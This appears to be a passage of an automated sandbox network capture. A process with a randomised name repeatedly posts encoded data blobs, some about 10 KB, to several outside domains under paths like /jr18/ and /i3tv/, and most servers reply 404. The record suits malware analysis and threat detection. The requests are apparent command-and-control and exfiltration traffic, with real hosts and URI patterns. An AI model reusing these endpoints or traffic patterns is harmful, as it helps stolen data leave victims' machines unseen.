                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.4 | 49776 | 74.48.143.82 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:10.226810932 CET | 516 | OUT | GET /ykn4/?qX=qP0hoZO0bjg4&ifzt=yDyVABeQ4Ct1InZ0OhfmdnBFKWQ7rCX+/8YxCwFx8D5ixU3VRgnj+l5ygnfgEeC3H+CzN484nEASY7Na52DMVUZTGbosqxUoBmbbT2616qreZhvQ7f+FXOQ= HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.bpgroup.site
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:43:11.526035070 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Connection: close
                                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                pragma: no-cache
                                                                                                                                                content-type: text/html
                                                                                                                                                content-length: 1251
                                                                                                                                                date: Mon, 25 Nov 2024 08:43:12 GMT
                                                                                                                                                server: LiteSpeed
                                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
Nov 25, 2024 09:43:11.526052952 CET | 253 | IN
                                                                                                                                                Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 49792 | 206.238.89.119 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:17.534715891 CET | 774 | OUT | POST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=6AQzfNtkJpKQ6YwpXsvhdxRLR78fViItN7p/hDgGXL2MMY/RTbDX4eZfpwliuCmZ1CUEyefIS266pooe/jBF4OZ2jE3Iq+OwmYw4YX3kSZknyyX3EWZDiEqyOSXd9Y3tO+JgKcSD8r6wMdYj+QYO5pAPJ/tnsGrIjIGOeqPahsz+lQ4VkARTvyRW1wkjUoibtg==
Nov 25, 2024 09:43:19.078130007 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:18 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49798 | 206.238.89.119 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:20.283946037 CET | 794 | OUT | POST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=6AQzfNtkJpKQ1cMpVLzhfRRKab8fcCJkN7l/hCVeW+mMP97RSejX5eZfxAlrqCme1CYmycbIS2u6ppYe+UtGpOZ02U3K3uOwmYw4YXzOSfMnzCn3CHZAskqzZiXd5Y3XO+IDKZ658pywMdoj+CwBsZBKHfsXlmCc6trGfrDK5oHBp21P1xwE9y1lo3tXZrfS2spct6F8pYf70E8opzvCk4s=
Nov 25, 2024 09:43:21.822235107 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:21 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49804 | 206.238.89.119 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
Timestamp | Bytes transferred | Direction | Data
Nov 25, 2024 09:43:23.012981892 CET | 10876 | OUT | POST /jr18/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.127358.win
                                                                                                                                                Referer: http://www.127358.win/jr18/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
Nov 25, 2024 09:43:24.539942026 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:24 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                12 | 192.168.2.4 | 49810 | 206.238.89.119 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:25.871084929 CET | 514 | OUT | GET /jr18/?ifzt=3C4Tc4Z0RY2s+tVmXeTOODIbYY0cZjMPNpxOrzRAWYWXOarDQI6T49to0R5yr2OUxBUw9rD3bXyFurU9wVp+2dZYmhq26qK0uIAUBFaEfelf6gXLCXJ0iXw=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.127358.win
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:27.326922894 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:27 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 548
                                                                                                                                                Connection: close
                                                                                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                13 | 192.168.2.4 | 49830 | 212.123.41.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:33.514730930 CET | 804 | OUT | POST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=UdtGsVpFIS+zINNIuoYA5B+3d4DMpHbyJXJsj8jR88ShE0nazof/CuY33dOsatSBVJtb/7mYmpuQYCA9SY4u2Xl9MH5m0E3ZD6Y1HULXIYaVA2dwfqkpNISPDD2k8rgsV9Lnpzhkb3KISjmxT6OjZ4arxtpLajtz+1XUXQ2w5qi6nMisjpNqZyrj+mKfFhKofw==
                                                                                                                                                Nov 25, 2024 09:43:34.856048107 CET | 670 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 08:40:36 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e7ed-36b"
                                                                                                                                                Content-Encoding: gzip


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                14 | 192.168.2.4 | 49836 | 212.123.41.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:36.188087940 CET | 824 | OUT | POST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=UdtGsVpFIS+zIt9ItLwA7h+0RYDM7HbIJXFsj92a7O2hFW/a0pf/DuY3/9PkXNTNVJRT//6Ymp6QYDw9RvMx5nl/Fn5ewE3ZD6Y1HVvxIYCVACZweOIqOISOUz2k4rgoV9L/pys5b1yISn2xTpWkXIat8No/bxAa/WTbKz6K9Kyfrqv2yYs9LyPQjhDrIi3hE8fPOir/+2QtpPtmpOjp9o8=
                                                                                                                                                Nov 25, 2024 09:43:37.476222992 CET | 670 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 09:04:26 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e874-36b"
                                                                                                                                                Content-Encoding: gzip


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                15 | 192.168.2.4 | 49842 | 212.123.41.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:38.860346079 CET | 10906 | OUT | POST /i3tv/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.caj-bioteaque.online
                                                                                                                                                Referer: http://www.caj-bioteaque.online/i3tv/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:40.150520086 CET | 670 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 08:40:41 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                ETag: W/"5d07e7ed-36b"
                                                                                                                                                Content-Encoding: gzip


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                16 | 192.168.2.4 | 49848 | 212.123.41.108 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:41.982048035 CET | 524 | OUT | GET /i3tv/?ifzt=ZfFmvi9Oe0q0E+s3tI8jowmrcKXFuAvLDG9tnsjazd2FMEfMyY6nK/4Bws6dZtaeRrlRwaDsvJ2Xfgg/epwI8XFwDGZNwHr0PbkZKGW1EbGZLzRKGsQFP6g=&qX=qP0hoZO0bjg4 HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.caj-bioteaque.online
                                                                                                                                                Connection: close
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Nov 25, 2024 09:43:43.245337963 CET | 1047 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                Date: Mon, 25 Nov 2024 09:04:31 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 875
                                                                                                                                                Connection: close
                                                                                                                                                ETag: "5d07e874-36b"
                                                                                                                                                Data Ascii: <!DOCTYPE html><html><head><title>Verification of Contact Information</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>Verification of Contact Information</h1><p>The domain is temporarily on hold pending verification of the email address of the Registrant as per the ICANN rules on Verification of Contact Information.</p><p>More details of these rules can be found at:<br/><a href="http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification">http://www.icann.org/en/resources/compliance/complaints/registrars/contact-verification</a>.</p><p>If you are the owner of this domain please contact your provider and request re-verification or follow the instructions emailed to you shortly after your order.</p></body></html>


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                17 | 192.168.2.4 | 49864 | 172.67.223.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:48.742036104 CET | 798 | OUT | POST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 201
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=8VTwEX/ISHyharZU1L4QpEGOtf7krhY2MEnSqMgHZkkrbUDyLIb9ZVb11zUSwal10hh6piE6ob7+93bE+QhJh053UhMdHW+ggJVIaBSJ4hXjTx6PlzmU5rv1uqsiIGfou1ybDTrTl/cqmig//rZES3RcnRq135JoA37U4X9npHm+ylC+Dl4j+p3HBjauI+KxIA==
                                                                                                                                                Nov 25, 2024 09:43:50.074935913 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:49 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=81xz05wKBT8Sl3SDWGNOdJn3MEcAMR0YwyOAfEgaqQbqFjqufv7zUcOmtkAQzo%2B3h9ExqowD0uIZFUHzVD7ktSeil5IOY5T5TcMPgX3intnXJq34sAcETHA5a2PakdwPW2Q3cTmxqjKO"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a738b624243-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2309&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=798&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Nov 25, 2024 09:43:50.074956894 CET | 342 | IN | Data Raw: [gzip-compressed response body, continued]


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                18 | 192.168.2.4 | 49872 | 172.67.223.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:51.404033899 CET | 818 | OUT | POST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 221
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=8VTwEX/ISHyhaLpU6IAQhEGNzP7k9RZ9MErSqJAtYS0ra1zyKJb9X1b1+TUXuql80hlypgg6obv+93rE+nNGgk5PPRMfJ2+ggJVIaH/B4hfjQCiPjimXnbv6pqsiMGfsu1ytDS3tl5Aqmjw/6qZbLHQXqxqjmIVgIF7flxlF3HWP6DPkSUZ0spT0ckTaF934TEBcMs4F93dFCmm1XGrXiQw=
                                                                                                                                                Nov 25, 2024 09:43:52.763998032 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:52 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbCixQaEzHN9xIhIJBUogLDHdf4H77tAXBf%2BB0ouOOe%2BwsDDZmd5glId0gl9hG6i%2FEg1vSZsC5sssPf3emtV3r%2F6xSzPKAzaJPcL73LHjT%2Bvitkzeooq4f%2BU7U1P6yPgmYUpPT713ZSu"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a8479ee42c2-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2062&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=818&delivery_rate=0&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                Nov 25, 2024 09:43:52.764067888 CET | 349 | IN | Data Raw: [gzip-compressed response body, continued]


                                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                19 | 192.168.2.4 | 49881 | 172.67.223.206 | 80 | 3164 | C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exe
                                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                Nov 25, 2024 09:43:54.086210012 CET | 10900 | OUT | POST /nja3/ HTTP/1.1
                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-us
                                                                                                                                                Host: www.ssrpidemt-soar.sbs
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Connection: close
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Content-Length: 10301
                                                                                                                                                Origin: http://www.ssrpidemt-soar.sbs
                                                                                                                                                Referer: http://www.ssrpidemt-soar.sbs/nja3/
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 BIDUBrowser/7.6 Safari/537.36
                                                                                                                                                Data Ascii: ifzt=[TRUNCATED]
                                                                                                                                                Nov 25, 2024 09:43:55.395097017 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                Date: Mon, 25 Nov 2024 08:43:55 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                Last-Modified: Thu, 29 Aug 2024 18:03:22 GMT
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=140qK32yVEVwPJUhwoLOY23A3fzoHPiIF9DPqyWJedvfp9m8QPrs%2FKnVLKlX%2BYOGDw4Roh2XWPJVzozek8wk5MegsrOCnh%2FwIfNkc7PmXeZ4AfzKVM6mQFQWXLx2bPia7Q3z2s3lmoUx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8e805a94e8a7c33d-EWR
                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1693&sent=5&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10900&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
